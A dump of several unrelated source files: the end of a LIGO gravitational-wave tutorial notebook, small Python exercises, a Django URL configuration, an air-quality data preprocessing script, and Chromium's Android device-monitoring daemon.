xextent=[-deltat,deltat]) plt.xlabel('time (s) since '+str(tevent)) plt.ylabel('Frequency (Hz)') plt.colorbar() plt.axis([-0.5, 0.5, 0, 500]) plt.title('aLIGO H1 strain data near GW150914') plt.savefig('GW150914_H1_spectrogram_whitened.png') # Plot the L1 whitened spectrogram around the signal plt.figure() spec_H1, freqs, bins, im = plt.specgram(strain_L1_whiten[indxt], NFFT=NFFT, Fs=fs, window=window, noverlap=NOVL, cmap=spec_cmap, xextent=[-deltat,deltat]) plt.xlabel('time (s) since '+str(tevent)) plt.ylabel('Frequency (Hz)') plt.colorbar() plt.axis([-0.5, 0.5, 0, 500]) plt.title('aLIGO L1 strain data near GW150914') plt.savefig('GW150914_L1_spectrogram_whitened.png') # See the smudge between -0.2 and 0 seconds? That's our signal! # You can see it 'chirping' from lower to higher frequency over a small fraction of a second. # ## Time-domain filtering - Bandpassing+notching # # Now let's filter the signal in the time domain, using bandpassing to reveal the signal in the frequency band [40 , 300 Hz], and notching of spectral lines to remove those noise sources from the data. # In[12]: # generate linear time-domain filter coefficients, common to both H1 and L1. # First, define some functions: # This function will generate digital filter coefficients for bandstops (notches). # Understanding it requires some signal processing expertise, which we won't get into here. def iir_bandstops(fstops, fs, order=4): """ellip notch filter fstops is a list of entries of the form [frequency (Hz), df, df2] where df is the pass width and df2 is the stop width (narrower than the pass width). Use caution if passing more than one freq at a time, because the filter response might behave in ways you don't expect. """ nyq = 0.5 * fs # Zeros zd, poles pd, and gain kd for the digital filter zd = np.array([]) pd = np.array([]) kd = 1 # Notches for fstopData in fstops: fstop = fstopData[0] df = fstopData[1] df2 = fstopData[2] low = (fstop - df) / nyq high = (fstop + df) / nyq low2 = (fstop - df2) / nyq high2 = (fstop + df2) / nyq z, p, k = iirdesign([low,high], [low2,high2], gpass=1, gstop=6, ftype='ellip', output='zpk') zd = np.append(zd,z) pd = np.append(pd,p) # Set gain to one at 100 Hz...better not notch there bPrelim,aPrelim = zpk2tf(zd, pd, 1) outFreq, outg0 = freqz(bPrelim, aPrelim, 100/nyq) # Return the numerator and denominator of the digital filter b,a = zpk2tf(zd,pd,k) return b, a def get_filter_coefs(fs): # assemble the filter b,a coefficients: coefs = [] # bandpass filter parameters lowcut=43 highcut=260 order = 4 # bandpass filter coefficients nyq = 0.5*fs low = lowcut / nyq high = highcut / nyq bb, ab = butter(order, [low, high], btype='band') coefs.append((bb,ab)) # Frequencies of notches at known instrumental spectral line frequencies. # You can see these lines in the ASD above, so it is straightforward to make this list. notchesAbsolute = np.array( [14.0,34.70, 35.30, 35.90, 36.70, 37.30, 40.95, 60.00, 120.00, 179.99, 304.99, 331.49, 510.02, 1009.99]) # notch filter coefficients: for notchf in notchesAbsolute: bn, an = iir_bandstops(np.array([[notchf,1,0.1]]), fs, order=4) coefs.append((bn,an)) # Manually do a wider notch filter around 510 Hz etc. bn, an = iir_bandstops(np.array([[510,200,20]]), fs, order=4) coefs.append((bn, an)) # also notch out the forest of lines around 331.5 Hz bn, an = iir_bandstops(np.array([[331.5,10,1]]), fs, order=4) coefs.append((bn, an)) return coefs # and then define the filter function: def filter_data(data_in,coefs): data = data_in.copy() for coef in coefs: b,a = coef # filtfilt applies a linear filter twice, once forward and once backwards. # The combined filter has linear phase. data = filtfilt(b, a, data) return data # To visualize the effect of this filter, let's generate "white" gaussian noise, and filter it. # In[13]: # get filter coefficients coefs = get_filter_coefs(fs) # generate random gaussian "data" data = np.random.randn(128*fs) # filter it: resp = filter_data(data,coefs) # compute the amplitude spectral density (ASD) of the original data, and the filtered data: NFFT = fs/2 Pxx_data, freqs = mlab.psd(data, Fs = fs, NFFT = NFFT) Pxx_resp, freqs = mlab.psd(resp, Fs = fs, NFFT = NFFT) # The asd is the square root; and let's normalize it to 1: norm = np.sqrt(Pxx_data).mean() asd_data = np.sqrt(Pxx_data)/norm asd_resp = np.sqrt(Pxx_resp)/norm # get the predicted filter frequency response using signal.freqz: Nc = 2000 filt_resp = np.ones(Nc) for coef in coefs: b,a = coef w,r = signal.freqz(b,a,worN=Nc) filt_resp = filt_resp*np.abs(r) freqf = (fs * 0.5 / np.pi) * w # We "double pass" the filtering using filtfilt, so we square the filter response filt_resp = filt_resp**2 # plot the ASDs plt.figure() plt.plot(freqs, asd_data,'b',label='white noise') plt.plot(freqs, asd_resp,'m',label='filtered white noise') plt.plot(freqf, filt_resp,'k--',label='filter response') plt.xlim([0,600]) plt.grid('on') plt.ylabel('ASD (strain/rtHz)') plt.xlabel('Freq (Hz)') plt.legend(loc='center right') plt.savefig('GW150914_filter.png') # From the above, you can see that the gaussian noise (blue) is "white" - it is flat in frequency (all the way up to Nyquist frequency of 2048 Hz, but we'lve cut it off at 600 Hz to see the effect of filtering). You can see in the filtered data (magenta) the effects of the bandpassing and the notches. # # Now let's filter the data, and plot the results: # In[14]: # filter the data: strain_H1_filt = filter_data(strain_H1, coefs) strain_L1_filt = filter_data(strain_L1, coefs) # filter NR template as we do with the data: NR_H1_filt = filter_data(NR_H1, coefs) # plot the data prior to filtering: plt.figure() plt.plot(time-tevent,strain_H1,'r',label='H1 strain') plt.plot(time-tevent,strain_L1,'g',label='L1 strain') plt.xlim([-0.2,0.1]) plt.xlabel('time (s) since '+str(tevent)) plt.ylabel('strain') plt.legend(loc='lower right') plt.title('aLIGO strain data near GW150914') plt.savefig('GW150914_H1_strain_unfiltered.png') # plot the data after filtering: # first, shift L1 by 7 ms, and invert. See the GW150914 detection paper for why! strain_L1_fils = -np.roll(strain_L1_filt,int(0.007*fs)) # We also have to shift the NR template by 2 ms to get it to line up properly with the data plt.figure() plt.plot(time-tevent,strain_H1_filt,'r',label='H1 strain') plt.plot(time-tevent,strain_L1_fils,'g',label='L1 strain') plt.plot(NRtime+0.002,NR_H1_filt,'k',label='matched NR waveform') plt.xlim([-0.2,0.1]) plt.ylim([-1.5e-21,1.5e-21]) plt.xlabel('time (s) since '+str(tevent)) plt.ylabel('strain') plt.legend(loc='lower left') plt.title('aLIGO FILTERED strain data near GW150914') plt.savefig('GW150914_H1_strain_filtered.png') # The filtered data peak at around 1.e-21, 1000 times smaller than the scale in the first plot. The "DC" offset between H1 and L1 data visible in the first plot is no longer visible here; the bandpassing cuts off frequency components below around 40 Hz. # # Now, as with whitening, the signal is visible as an oscillation sweeping from low to high frequency from -0.10 seconds to 0, then damping down into the random noise. Again, it looks roughly the same in both detectors, after shifting and flipping the L1 data with respect to H1. It's exactly the kind of signal we expect from the inspiral, merger and ringdown of two massive black holes. # # And as with whitening, the NR waveform looks, by eye, to be a good match to the data in both detectors; the signal is consistent with the waveform predicted from General Relativity. # ## Make sound files # # Make wav (sound) files from the filtered, downsampled data, +-2s around the event. # In[15]: # make wav (sound) files from the whitened data, +-2s around the event. from scipy.io import wavfile # function to keep the data within integer limits, and write to wavfile: def write_wavfile(filename,fs,data): d = np.int16(data/np.max(np.abs(data)) * 32767 * 0.9) wavfile.write(filename,int(fs), d) tevent = 1126259462.422 # Mon Sep 14 09:50:45 GMT 2015 deltat = 2. # seconds around the event # index into the strain time series for this time interval: indxt = np.where((time >= tevent-deltat) & (time < tevent+deltat)) # write the files: write_wavfile("GW150914_H1_whitenbp.wav",int(fs), strain_H1_whitenbp[indxt]) write_wavfile("GW150914_L1_whitenbp.wav",int(fs), strain_L1_whitenbp[indxt]) write_wavfile("GW150914_NR_whitenbp.wav",int(fs), NR_H1_whitenbp) # With good headphones, you'll hear a faint thump in the middle. # # We can enhance this by increasing the frequency; # this is the "audio" equivalent of the enhanced visuals that NASA employs on telescope images with "false color". # # The code below will shift the data up by 400 Hz (by taking an FFT, shifting/rolling the frequency series, then inverse fft-ing). The resulting sound file will be noticibly more high-pitched, and the signal will be easier to hear. # In[16]: # function that shifts frequency of a band-passed signal def reqshift(data,fshift=100,sample_rate=4096): """Frequency shift the signal by constant """ x = np.fft.rfft(data) T = len(data)/float(sample_rate) df = 1.0/T nbins = int(fshift/df) # print T,df,nbins,x.real.shape y = np.roll(x.real,nbins) + 1j*np.roll(x.imag,nbins) z = np.fft.irfft(y) return z # parameters for frequency shift fs = 4096 fshift = 400. speedup = 1. fss = int(float(fs)*float(speedup)) # shift frequency of the data strain_H1_shifted = reqshift(strain_H1_whitenbp,fshift=fshift,sample_rate=fs) strain_L1_shifted = reqshift(strain_L1_whitenbp,fshift=fshift,sample_rate=fs) NR_H1_shifted = reqshift(NR_H1_whitenbp,fshift=fshift,sample_rate=fs) # write the files: write_wavfile("GW150914_H1_shifted.wav",int(fs), strain_H1_shifted[indxt]) write_wavfile("GW150914_L1_shifted.wav",int(fs), strain_L1_shifted[indxt]) write_wavfile("GW150914_NR_shifted.wav",int(fs), NR_H1_shifted) # ## Downsampling from 16384 Hz to 4096 Hz # # So far, we have been working with data sampled at fs=4096 Hz. This is entirely sufficient for signals with no frequency content above f_Nyquist = fs/2 = 2048 Hz, such as GW150914. # # We downsample to 4096 Hz to save on download time, disk space, and memory requirements. If, however, you are interested in signals with frequency content above 2048 Hz, you need the data sampled at the full rate of 16384 Hz. # # Here we demonstrate how to do that downsampling, and how it might limit you is you are interested in frequency content near 2048 Hz and above. # # First, download a LOSC data file containing 32 seconds of data at the full 16384 Hz rate, and another downsampled at 4096 Hs, and put them in your working directory / folder: # * https://losc.ligo.org/s/events/GW150914/H-H1_LOSC_16_V1-1126259446-32.hdf5 # * https://losc.ligo.org/s/events/GW150914/H-H1_LOSC_4_V1-1126259446-32.hdf5 # In[17]: # read in the data at 16384 Hz and at 4096 Hz: fn_16 = 'H-H1_LOSC_16_V1-1126259446-32.hdf5' strain_16, time_16, chan_dict = rl.loaddata(fn_16, 'H1') fn_4 = 'H-H1_LOSC_4_V1-1126259446-32.hdf5' strain_4, time_4, chan_dict = rl.loaddata(fn_4, 'H1') # Make PSDs of each: fs = 16384 NFFT = 1*fs Pxx_16, freqs_16 = mlab.psd(strain_16, Fs = fs, NFFT = NFFT) fs = 4096 NFFT = 1*fs Pxx_4, freqs_4 = mlab.psd(strain_4, Fs = fs, NFFT = NFFT) fmin = 10 fmax = 8192 plt.figure() plt.loglog(freqs_16, np.sqrt(Pxx_16),'b',label='strain at 16384') plt.loglog(freqs_4, np.sqrt(Pxx_4), 'm',label='strain at 4096') plt.axis([fmin, fmax, 1e-24, 1e-19]) plt.grid('on') plt.ylabel('ASD (strain/rtHz)') plt.xlabel('Freq (Hz)') plt.legend(loc='upper center') plt.title('Advanced LIGO strain data near GW150914') plt.savefig('GW150914_H1_ASD_16384.png') # Good agreement between 16384 Hz data and 4096 Hz data, # up to around f_Nyquist = 2048 Hz. Let's zoom in for a closer look: # In[18]: # Zoom in on the 1000-2000 Hz region: fmin = 1500 fmax = 2100 plt.figure() plt.plot(freqs_16, np.sqrt(Pxx_16),'b',label='strain at 16384') plt.plot(freqs_4, np.sqrt(Pxx_4), 'm',label='strain at 4096') plt.axis([fmin, fmax, 1e-23, 5e-23]) plt.grid('on') plt.ylabel('ASD (strain/rtHz)') plt.xlabel('Freq (Hz)') plt.legend(loc='upper center') plt.title('Advanced LIGO strain data near GW150914') plt.savefig('GW150914_H1_ASD_16384_zoom.png') # The downsampled data deviate significantly from the original above ~1700 Hz. This is an undesirable, but inevitable result of downsampling (decimating). The plus side is that for frequencies less than 80% of Nyquist, the data are faithfully reproduced. # # If frequency content above that point is important to you, you need to use the 16384 Hz data. # # Else, you can save download time, disk space and memory by using the 4096 Hz data. # In[19]: # Now downsample the 16384 Hz data and compare with the 4096 Hz data factor = 4 numtaps = 61 strain_4new = signal.decimate(strain_16, factor, numtaps-1,ftype='fir') fs = 4096 NFFT = 1*fs Pxx_4new, freqs_4 = mlab.psd(strain_4new, Fs = fs, NFFT = NFFT) fmin = 1500 fmax = 2100 plt.figure() plt.plot(freqs_4, np.sqrt(Pxx_4new),'b',label='strain at 4096 from decimate') plt.plot(freqs_4, np.sqrt(Pxx_4), 'm--',label='strain at 4096 from file') plt.axis([fmin, fmax, 1e-23, 5e-23]) plt.grid('on') plt.ylabel('ASD (strain/rtHz)') plt.xlabel('Freq (Hz)') plt.legend(loc='upper left') plt.title('Advanced LIGO strain data near GW150914') plt.savefig('GW150914_H1_ASD_4096_zoom.png') # The two traces are on top of each other, as expected. That's how we made the downsampled data in the first place. # From the above, we learn exactly how LOSC downsamples the strain time series from 16384 Hz to 4096 Hz # (ie, using scipy.decimate), and that if you are interested in frequency content above ~ 1700 Hz, # use the 16384 Hz sample rate data instead. # ## Data segments # # As mentioned above, LIGO strain time series data has gaps (filled with NaNs) when the detectors are not taking valid ("science quality") data. Analyzing these data requires the user to loop over "segments" of valid data stretches. # # For this GW150914 data release, the data have no gaps. Let's verify this, using the L1 data file containing 32 seconds of data sampled at 4096 Hz. # # You are welcome to repeat this with H1 data, with files containing 4096 seconds of data, and with data sampled at 16384 Hz. All of the relevant files are listed near the top of this tutorial. # In[20]: # read in the data at 4096 Hz: fn = 'L-L1_LOSC_4_V1-1126259446-32.hdf5' strain, time, chan_dict = rl.loaddata(fn, 'H1') print "Contents of all the key, value pairs in chan_dict" for keys,values in chan_dict.items(): print(keys) print(values) print "We see that all keys have 32 seconds of '1', meaning the data pass all data quality flags" print "and have no HW injections, except there are CW injections in L1." print " " print 'Total number of non-NaNs in these data = ',np.sum(~np.isnan(strain)) print 'GPS start, GPS stop and length of all data in this file = ',time[0], time[-1],len(strain) # select the level of data quality; default is "DATA" but "CBC_CAT3" is a conservative choice: DQflag = 'CBC_CAT3' # readligo.py method for computing segments (start and stop times with continuous valid data): segment_list = rl.dq_channel_to_seglist(chan_dict[DQflag]) print 'Number of segments with DQflag',DQflag,' = ',len(segment_list) # loop over seconds and print out start, stop and length: iseg = 0 for segment in segment_list: time_seg = time[segment] seg_strain = strain[segment] print 'GPS start, GPS stop and length of segment',iseg, 'in this file = ',time_seg[0], time_seg[-1], len(seg_strain) iseg = iseg+1 # here is where you would insert code to analyze the data in this segment. # now look at segments with no CBC hardware injections: DQflag = 'NO_CBC_HW_INJ' segment_list = rl.dq_channel_to_seglist(chan_dict['NO_CBC_HW_INJ']) print 'Number of segments with DQflag',DQflag,' = ',len(segment_list) iseg = 0 for segment in segment_list: time_seg = time[segment] seg_strain = strain[segment] print 'GPS start, GPS stop and length of segment',iseg, 'in this file = ',time_seg[0], time_seg[-1], len(seg_strain) iseg = iseg+1
75b8cf6fde95fbd9a46ab0c2c5277b706714856b
ce6538b5b7da162c1c690a346e7ec9ae0a6291f3
/wild_cat_zoo/project/cheetah.py
92f02831fe0904412100be1467c39f16c02a2ad7
[]
no_license
DaniTodorowa/Softuni
391f13dd61a6d16cd48ee06e9b35b2fd931375df
f7c875fda4e13ec63152671509aaa6eca29d7f50
refs/heads/master
2022-11-25T23:34:49.744315
2020-08-02T08:23:44
2020-08-02T08:23:44
278,938,559
0
0
null
null
null
null
UTF-8
Python
false
false
298
py
class Cheetah: def __init__(self, name, gender, age): self.name = name self.gender = gender self.age = age @staticmethod def get_needs(self): return 60 def __repr__(self): return f"Name: {self.name}, Age: {self.age}, Gender: {self.gender}"
c02054b0e7144f761e863a5a249d40a75b1c8cc5
6a609bc67d6a271c1bd26885ce90b3332995143c
/exercises/exhaustive-search/combinations_ii.py
46561751342eaead6317019aa18b093dfc811644
[]
no_license
nahgnaw/data-structure
1c38b3f7e4953462c5c46310b53912a6e3bced9b
18ed31a3edf20a3e5a0b7a0b56acca5b98939693
refs/heads/master
2020-04-05T18:33:46.321909
2016-07-29T21:14:12
2016-07-29T21:14:12
44,650,911
0
0
null
null
null
null
UTF-8
Python
false
false
668
py
# -*- coding: utf-8 -*- """ Given a list of integer lists. Each time take an item from each list. Find all the combinations. """ class Solution(object): def combine(self, arr): """ :type arr: List[List[init]] :rtype: List[List[int]] """ def dfs(res, pos): if len(res) == len(arr): results.append(res) return for i in xrange(len(arr[pos])): dfs(res + [arr[pos][i]], pos + 1) results = [] dfs([], 0) return results if __name__ == '__main__': arr = [[1,2], [3,4], [5,6,7]] sol = Solution() print sol.combine(arr)
c359621f88fe116601d909b5dce736eebf473a4f
132c7b0c8ba606a249fbdfe24f9d73e7e224d260
/sanyuapp/urls.py
718ddf53afbfca5bc73c30fb4040c7281a875e3f
[]
no_license
sanyuOnline/sanyu-webapp
dafa3505d7f3d6eca225ca6b4dce3fa683d5e9fe
c8e3824146bb9eb4dcf971a1cdef2bc4475385f1
refs/heads/main
2023-08-31T12:52:06.104078
2021-10-27T07:03:09
2021-10-27T07:03:09
406,589,964
0
0
null
null
null
null
UTF-8
Python
false
false
1,073
py
"""sanyuapp URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/3.2/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) """ from django.contrib import admin from django.urls import path, include from django.conf import settings from django.conf.urls.static import static urlpatterns = [ path('admin/', admin.site.urls), path('users/', include('users.urls')), path('users/', include('django.contrib.auth.urls')), path('', include('pages.urls')), path('', include('blog.urls')), ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
f1fc5e04b67e273abf07193662fafc8712fb4c60
07c262960dde4da25e48030d1d4727e2e4392e45
/hw1/data/prepcocess.py
ef43c8e69176db0b4d21c0c6aa853863cda6f2e0
[]
no_license
a127000555/ML2018SPRING
2aae1fdaf92ff439e459a062a04d7b73fc3fb502
44d7ddf1abfae0c130cb0d57bd6bafbd14764eba
refs/heads/master
2021-03-30T21:03:22.259450
2018-07-05T16:01:25
2018-07-05T16:01:25
124,531,741
0
0
null
null
null
null
UTF-8
Python
false
false
4,342
py
import csv import numpy as np cin = csv.reader(open('train.csv','r',encoding='big5')) table = [row for row in cin] #print(np.array(table)) stamp = 0 banned = ['2014/3/12','2014/4/2' , '2014/4/6'] all_training = [] for row_idx_head in range(1,len(table),18): if table[row_idx_head][0] in banned: continue day = { 'id' : table[row_idx_head][0] } for row_idx in range(row_idx_head,row_idx_head+18): row = table[row_idx] day.update({ row[2] : row[3:]}) # RAINFALL concert rain = day['RAINFALL'] for idx in range(len(rain)): if rain[idx] == 'NR' or float(rain[idx]) < 3: rain[idx] = '0.0' else: rain[idx] = '1' day.update( {'RAINFALL' : rain}) # PM2.5 error correct pm = list(map(float,day['PM2.5'])) try: for idx in range(len(pm)): if pm[idx] < 1 or pm[idx] > 110: raise Error() if 0 < idx and idx < len(pm)-1: if abs (pm[idx-1] - pm[idx+1] ) < 20 and abs (pm[idx] - pm[idx+1]) > 18: pass #print((pm[idx-1],pm[idx],pm[idx+1]),pm , sep='\n') #raise Error() except: continue day.update( {'PM2.5' : pm}) # PM10 error correct pm = list(map(float,day['PM10'])) try: for item in pm: if item == 0 or item >200: #print(pm) raise Error() except: continue day.update( {'PM10' : pm}) # CO error correct co = list(map(float,day['CO'])) try: pass #print(np.array(co)) # for item in co: # if item == 0 or item >200: # print(pm) # raise Error() except: continue day.update( {'CO' : co}) wd = list(map(float,day['WIND_DIREC'])) try: day.update( {'WD_COS' : np.cos(np.array(wd) * np.pi / 180)}) day.update( {'WD_SIN' : np.sin(np.array(wd) * np.pi / 180)}) print(np.cos(np.array(wd) *np.pi / 180)) print(np.sin(np.array(wd) *np.pi / 180)) # for item in co: # if item == 0 or item >200: # print(pm) # raise Error() except Exception as e: print(e) exit(0) continue all_training.append(day) #exit(0) #print(all_training) import pickle with open('date_process/train.pickle','wb') as fout: pickle.dump(all_training,fout) cin = csv.reader(open('test.csv','r',encoding='big5')) table = [row for row in cin] #print(np.array(table) , len(table),18) all_training = [] for row_idx_head in range(0,len(table),18): if table[row_idx_head][0] in banned: continue day = { 'id' : table[row_idx_head][0] } for row_idx in range(row_idx_head,row_idx_head+18): row = table[row_idx] day.update({ row[1] : row[2:]}) # RAINFALL correct rain = day['RAINFALL'] for idx in range(len(rain)): if rain[idx] == 'NR': rain[idx] = '0.0' day.update( {'RAINFALL' : rain}) # PM2.5 error correct pm = list(map(float,day['PM2.5'])) try: for idx in range(len(pm)): if pm[idx] <= 0 : if 0 < idx and idx < len(pm)-1 and 5 < pm[idx+1] and pm[idx+1]< 100: pm[idx] = (pm[idx-1] + pm[idx+1])/2 else: # edge processing if idx == 0: pm[idx] = ( pm[idx+1] + pm[idx+2] )/2 if idx == len(pm)-1: pm[idx] = pm[idx-1] except: continue try: for idx in range(len(pm)): if 0 < idx and idx < len(pm)-1: if abs (pm[idx-1] - pm[idx+1] ) < 20 and abs (pm[idx] - pm[idx+1]) > 20: pm[idx] = ( pm[idx-1] + pm[idx+1] )/2 #print((pm[idx-1],pm[idx],pm[idx+1]),pm , sep='\n') except: continue day.update( {'PM2.5' : pm}) #print(day['PM2.5']) # PM10 error correct pm = list(map(float,day['PM10'])) try: for idx in range(len(pm)): if pm[idx] <= 0 : if 0 < idx and idx < len(pm)-1 and 5 < pm[idx+1] and pm[idx+1]< 100: #print('=>' , pm) pm[idx] = (pm[idx-1] + pm[idx+1])/2 #print('<=' , pm) else: # edge processing if idx == 0: pm[idx] = ( pm[idx+1] + pm[idx+2] )/2 if idx == len(pm)-1: pm[idx] = pm[idx-1] except: continue day.update( {'PM10' : pm}) all_training.append(day) #print(all_training) with open('date_process/test.pickle','wb') as fout: pickle.dump(all_training,fout) ''' PM 2.5 cleaning: 2014/3/12 [65.0, 61.0, 66.0, 66.0, 69.0, 131.0, 919.0, 919.0, 919.0, 0.0, 0.0, 908.0, 914.0, 914.0, 914.0, 70.0, 72.0, 82.0, 86.0, 97.0, 98.0, 98.0, 87.0, 76.0] 919.0 can't tell. 2014/4/2 [21.0, 22.0, 26.0, 15.0, 12.0, 3.0, 10.0, 13.0, 19.0, 16.0, 0.0, 631.0, 5.0, 0.0, 12.0, 15.0, 7.0, 10.0, 18.0, 29.0, 34.0, 37.0, 50.0, 51.0] 631.0 can't tell. 2014/4/6 NMHC / THC chaos. '''
314255e054c0ccca2a072d2515304f2f4f772b2d
2896efe044a9b5d7caa545f39eb8bc12e514f275
/lab02a.py
2d8d43abff4d51d2515919aaed1bf3c824c38378
[]
no_license
riamokashi/Computer-Science-Labs
8d4acf23f3b7d0f4b5b9cb7475caaeef136fe047
15b662f46a37dbe20031ef6ecb0e063fce3d7df4
refs/heads/master
2020-08-16T04:30:31.001123
2019-10-16T04:11:43
2019-10-16T04:11:43
215,454,752
0
0
null
null
null
null
UTF-8
Python
false
false
767
py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Mon Sep 9 16:36:12 2019 @author: riamokashi """ odd_sum = 0 even_sum = 0 odd_count = 0 even_count = 0 positive_int_count = 0 while True: n_str = input("Input an integer (0 terminates): ") n_int = int(n_str) if n_int == 0: break elif n_int < 0: continue elif n_int % 2 == 1: odd_sum += n_int odd_count += 1 elif n_int % 2 == 0: even_sum += n_int even_count += 1 positive_int_count += 1 # Good stuff goes here print() print("sum of odds:", odd_sum) print("sum of evens:", even_sum) print("odd count:", odd_count) print("even count:", even_count) print("total positive int count:", positive_int_count)
57d831e8dd13648f57838ae881015f3fc20c13d1
ebb6deb23eba704efeecd300ad42770f73007470
/ind1_1.py
bbe0af5bfe6ca114ffb098abf03806b124b1f7b1
[ "MIT" ]
permissive
IshchenkoMaksim/lab6
a1d275c0008c5d446e670ec6092f37e56ea8c1c1
92c1b298e0c97c22fbd43fe81ddc510ef994cbc3
refs/heads/main
2023-05-02T15:53:13.136710
2021-05-12T13:14:13
2021-05-12T13:14:13
365,343,695
0
0
null
null
null
null
UTF-8
Python
false
false
652
py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # №1 В-1 Ввести список А из 10 элементов, найти наибольший элемент и переставить его с первым элементом. # Преобразованный массив вывести. import sys if __name__ == '__main__': A = list(map(int, input().split())) n = 0 if len(A) != 10: print("Неверный размер списка", file=sys.stderr) exit(1) n = max(a for i, a in enumerate(A)) n = A.index(n) if n == 0: print(A) else: A[0], A[n] = A[n], A[0] print(A)
e9b4572ab1f8e1c87a7d0030bcf82691a6a035e5
880103c6f9bdc9d5a7a8633c3e4d108c964e9b89
/devil/devil/android/tools/device_monitor.py
2b3503174c8a364463e242fa2f450a76e5b3047f
[ "BSD-3-Clause" ]
permissive
ateleshev/catapult
c3645f0fb0d4e929b5baebea33307b765225cb2f
faf60eb37f8b9828eddb30c8397b333eb1d89204
refs/heads/master
2021-01-22T19:08:47.140355
2017-03-16T01:01:54
2017-03-16T01:01:54
null
0
0
null
null
null
null
UTF-8
Python
false
false
6,936
py
#!/usr/bin/env python # Copyright 2015 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Launches a daemon to monitor android device temperatures & status. This script will repeatedly poll the given devices for their temperatures and status every 60 seconds and dump the stats to file on the host. """ import argparse import collections import json import logging import logging.handlers import os import re import socket import sys import time if __name__ == '__main__': sys.path.append( os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', '..'))) from devil import devil_env from devil.android import battery_utils from devil.android import device_blacklist from devil.android import device_errors from devil.android import device_utils # Various names of sensors used to measure cpu temp CPU_TEMP_SENSORS = [ # most nexus devices 'tsens_tz_sensor0', # android one 'mtktscpu', # nexus 9 'CPU-therm', ] DEVICE_FILE_VERSION = 1 # TODO(bpastene): Remove the old file once sysmon has been updated to read the # new status file. DEVICE_FILES = [ os.path.join(os.path.expanduser('~'), 'android_device_status.json'), os.path.join( os.path.expanduser('~'), '.android', '%s__android_device_status.json' % socket.gethostname().split('.')[0] ), ] MEM_INFO_REGEX = re.compile(r'.*?\:\s*(\d+)\s*kB') # ex: 'MemTotal: 185735 kB' def get_device_status(device): """Polls the given device for various info. Returns: A dict of the following format: { 'battery': { 'level': 100, 'temperature': 123 }, 'build': { 'build.id': 'ABC12D', 'product.device': 'chickenofthesea' }, 'mem': { 'avail': 1000000, 'total': 1234567, }, 'processes': 123, 'state': 'good', 'temp': { 'some_sensor': 30 }, 'uptime': 1234.56, } """ status = collections.defaultdict(dict) # Battery battery = battery_utils.BatteryUtils(device) battery_info = battery.GetBatteryInfo() try: level = int(battery_info.get('level')) except (KeyError, TypeError, ValueError): level = None if level and level >= 0 and level <= 100: status['battery']['level'] = level try: temperature = int(battery_info.get('temperature')) except (KeyError, TypeError, ValueError): temperature = None if temperature: status['battery']['temperature'] = temperature # Build status['build']['build.id'] = device.build_id status['build']['product.device'] = device.build_product # Memory mem_info = '' try: mem_info = device.ReadFile('/proc/meminfo') except device_errors.AdbShellCommandFailedError: logging.exception('Unable to read /proc/meminfo') for line in mem_info.splitlines(): match = MEM_INFO_REGEX.match(line) if match: try: value = int(match.group(1)) except ValueError: continue key = line.split(':')[0].strip() if 'MemTotal' == key: status['mem']['total'] = value elif 'MemFree' == key: status['mem']['free'] = value # Process try: lines = device.RunShellCommand('ps', check_return=True) status['processes'] = len(lines) - 1 # Ignore the header row. except device_errors.AdbShellCommandFailedError: logging.exception('Unable to count process list.') # CPU Temps # Find a thermal sensor that matches one in CPU_TEMP_SENSORS and read its # temperature. files = [] try: files = device.RunShellCommand( 'grep -lE "%s" /sys/class/thermal/thermal_zone*/type' % '|'.join( CPU_TEMP_SENSORS), check_return=True) except device_errors.AdbShellCommandFailedError: logging.exception('Unable to list thermal sensors.') for f in files: try: sensor_name = device.ReadFile(f).strip() temp = float(device.ReadFile(f[:-4] + 'temp').strip()) # s/type^/temp status['temp'][sensor_name] = temp except (device_errors.AdbShellCommandFailedError, ValueError): logging.exception('Unable to read thermal sensor %s', f) # Uptime try: uptimes = device.ReadFile('/proc/uptime').split() status['uptime'] = float(uptimes[0]) # Take the first field (actual uptime) except (device_errors.AdbShellCommandFailedError, ValueError): logging.exception('Unable to read /proc/uptime') status['state'] = 'available' return status def get_all_status(blacklist): status_dict = { 'version': DEVICE_FILE_VERSION, 'devices': {}, } healthy_devices = device_utils.DeviceUtils.HealthyDevices(blacklist) parallel_devices = device_utils.DeviceUtils.parallel(healthy_devices) results = parallel_devices.pMap(get_device_status).pGet(None) status_dict['devices'] = { device.serial: result for device, result in zip(healthy_devices, results) } if blacklist: for device, reason in blacklist.Read().iteritems(): status_dict['devices'][device] = { 'state': reason.get('reason', 'blacklisted')} status_dict['timestamp'] = time.time() return status_dict def main(argv): """Launches the device monitor. Polls the devices for their battery and cpu temperatures and scans the blacklist file every 60 seconds and dumps the data to DEVICE_FILE. """ parser = argparse.ArgumentParser( description='Launches the device monitor.') parser.add_argument('--adb-path', help='Path to adb binary.') parser.add_argument('--blacklist-file', help='Path to device blacklist file.') args = parser.parse_args(argv) logger = logging.getLogger() logger.setLevel(logging.DEBUG) handler = logging.handlers.RotatingFileHandler( '/tmp/device_monitor.log', maxBytes=10 * 1024 * 1024, backupCount=5) fmt = logging.Formatter('%(asctime)s %(levelname)s %(message)s', datefmt='%y%m%d %H:%M:%S') handler.setFormatter(fmt) logger.addHandler(handler) devil_dynamic_config = devil_env.EmptyConfig() if args.adb_path: devil_dynamic_config['dependencies'].update( devil_env.LocalConfigItem( 'adb', devil_env.GetPlatform(), args.adb_path)) devil_env.config.Initialize(configs=[devil_dynamic_config]) blacklist = (device_blacklist.Blacklist(args.blacklist_file) if args.blacklist_file else None) logging.info('Device monitor running with pid %d, adb: %s, blacklist: %s', os.getpid(), args.adb_path, args.blacklist_file) while True: start = time.time() status_dict = get_all_status(blacklist) for device_file in DEVICE_FILES: with open(device_file, 'wb') as f: json.dump(status_dict, f, indent=2, sort_keys=True) logging.info('Got status of all devices in %.2fs.', time.time() - start) time.sleep(60) if __name__ == '__main__': sys.exit(main(sys.argv[1:]))
